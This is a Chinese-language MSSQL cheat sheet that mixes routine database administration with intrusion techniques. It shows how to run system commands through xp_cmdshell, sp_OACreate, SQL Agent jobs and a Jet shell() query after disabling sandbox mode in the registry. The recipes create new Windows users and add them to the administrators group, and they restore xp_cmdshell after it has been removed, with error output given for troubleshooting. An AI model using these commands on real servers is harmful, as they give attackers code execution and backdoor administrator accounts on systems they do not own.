mssql使用總結

重設密碼

exec sp_password null,'新密碼','sa'

執行系統命令

(1)exec xp_cmdshell '要執行的命令'

(2)declare @shell int
exec sp_oacreate 'wscript.shell',@shell out

exec sp_oamethod @shell ,'run',null,'要執行的系統命令'
exec sp_oamethod @shell ,'run',null,'c:\windows\system32\cmd.exe /c net user kkk zzz /add'
exec sp_oamethod @shell ,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators kkk /add'

(3)use msdb;
exec sp_add_job @job_name='ok1';
exec sp_add_jobstep @job_name='ok1',@step_name = 'okok',@subsystem='CMDEXEC',@command='net user ok 123 /add';
exec sp_add_jobserver @job_name = 'ok1',@server_name = 'WWW-84937FCF932';
exec sp_start_job @job_name='ok1'

(4)exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0--開啟沙盤模式

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'--查看沙盤模式的狀態
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 321 /add")');--建立一個用戶名為123的用戶

1.如果沙盒保護模式未“關閉”，會報錯：
服務器: 消息 7357，級別 16，狀態 2，行 1
未能處理對象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出該對象中沒有任何列。
OLE DB 錯誤跟蹤[Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。

2.如果.mdb不存在或是輸入路徑錯誤
服務器: 消息 7399，級別 16，狀態 1，行 1
OLE DB 提供程序 'microsoft.jet.oledb.4.0' 報錯。
[OLE/DB provider returned message: 找不到文件 'C:WINDOWSsystem32iasdnary1.mdb'。]
OLE DB 錯誤跟蹤[OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005: ]。

3.如果輸入過程中多了一些空格，也會報錯。尤其要注意這點，很多人直接網上找文章復制粘貼進去執行。
服務器: 消息 7357，級別 16，狀態 2，行 1
未能處理對象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出該對象中沒有任何列。
OLE DB 錯誤跟蹤[Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。

4.如果mdb權限和cmd.exe權限不對，同樣會也出現問題。
當mdb權限不對時，
服務器: 消息 7320，級別 16，狀態 2，行 1
未能對 OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 執行查詢。
[OLE/DB provider returned message: 未知]
OLE DB 錯誤跟蹤[OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14]

查看用戶權限

sp_helprotect null,'用戶名'

打開sql2005的xp_cmdshell

-- 允許配置高級選項
EXEC sp_configure 'show advanced options', 1
GO
-- 重新配置
RECONFIGURE
GO
-- 啟用xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1

GO
--重新配置
RECONFIGURE
GO

--執行想要的xp_cmdshell語句
Exec xp_cmdshell 'query user'
GO

--用完后,要記得將xp_cmdshell禁用(從安全角度安全考慮)

-- 禁用xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 0
GO
--重新配置
RECONFIGURE
GO
-- 禁用配置高級選項
EXEC sp_configure 'show advanced options', 0
GO
-- 重新配置
RECONFIGURE
GO

查看mssql操作日志

SELECT * FROM fn_dblog(null,null)

附加數據庫的命令

oSQL -U sa -P （回車）
1> sp_attach_db @dbname = N'xxx',
2>@filename1 = N'x:\xxx\xxx\xxx.mdf',
3>@filename2 = N'x:\xxx\xxx\xxx.ldf';
4>go

收縮數據庫

dbcc shrinkdatabase('db_name')

擴展數據庫文件

alter database db_customsms add file(NAME=db_customsms_data,FILENAME='D:\MSDE\MSSQL\Data\db_customsms_data3.mdf')

導出表中的數據為txt

bcp "Northwind.dbo.Customers" out "d:\customers.txt" -c -Usa -Psa

bcp "select * from Northwind" queryout "d:\customers.txt" -c -Usa -Psa

刪除xp_cmdshell

EXEC sp_dropextendedproc 'xp_cmdshell'

恢復xp_cmdshell

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

獲取當前服務器系統時間

select getdate() from 任意一張表的名稱

恢復xp_cmdshell

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

查看數據庫連接

select @@connections

exec sp_who 'active'

增加mssql緩存

exec sp_configure 'show advanced options',1

reconfigure

exec sp_configure 'max server memory',512

reconfigure

查看當前所使用數據庫所在的路徑

select * from sysfiles;

恢復sp_addextendedproc語句：
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/ (owner.)name of function to call /
@dllname varchar(255)/ name of DLL containing function /
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
恢復sp_dropextendedproc 語句：
create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of function
as
-- If we're in a transaction, disallow the dropping of the
-- extended stored procedure.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end

-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
恢復 sp_OACreate 語句

exec sp_addextendedproc sp_OACreate,'odsole70.dll'

替換記錄中的字符

REPLACE ( original-string, search-string, replace-string )

這個函數有一點不足是不支持 text,ntext類型字段的替換，可以通過下面的語句來實現：
update tableName set recordName=replace(cast(recordName as varchar(8000)) ,'abc','ddd')

導出execl表格

exec xp_cmdshell 'bcp "select *或列名1，列名2 from 庫名.所有者.表名" queryout "c:\文件名.xls" -c -q -S "主機名" -U "用戶名" -P "密碼"'

裝sql server sp4時,出現以前進行的程序安裝創建了掛起的文件操作.運行程序之前,必須重新起動計算機

         在安裝Sql或sp補丁的時候系統提示之前有掛起的安裝操作，要求重啟，這里往往重啟無用，解決辦法：到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager　　刪除PendingFileRenameOperations.